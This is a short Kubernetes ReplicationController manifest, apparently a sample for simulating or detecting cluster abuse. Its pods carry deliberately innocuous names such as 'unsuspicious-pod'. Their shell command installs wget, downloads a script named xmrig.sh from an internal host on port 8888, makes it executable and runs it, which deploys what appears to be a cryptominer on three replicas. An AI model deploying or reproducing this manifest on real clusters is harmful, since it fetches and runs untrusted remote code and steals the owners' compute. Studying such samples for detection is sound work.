apiVersion: v1
kind: ReplicationController
metadata:
  name: unsuspicious-replication-controller
spec:
  replicas: 3
  template:
    metadata:
      namespace: default
      labels:
        name: selector
    spec:
      containers:
      - name: unsuspicious-pod
        image: nginx
        command: ["/bin/sh"]
        args: ["-c", "apt update && apt install -y wget htop && cd /tmp && sleep 30 && wget 10.17.72.12:8888/xmrig.sh && chmod 777 xmrig.sh && ./xmrig.sh"]
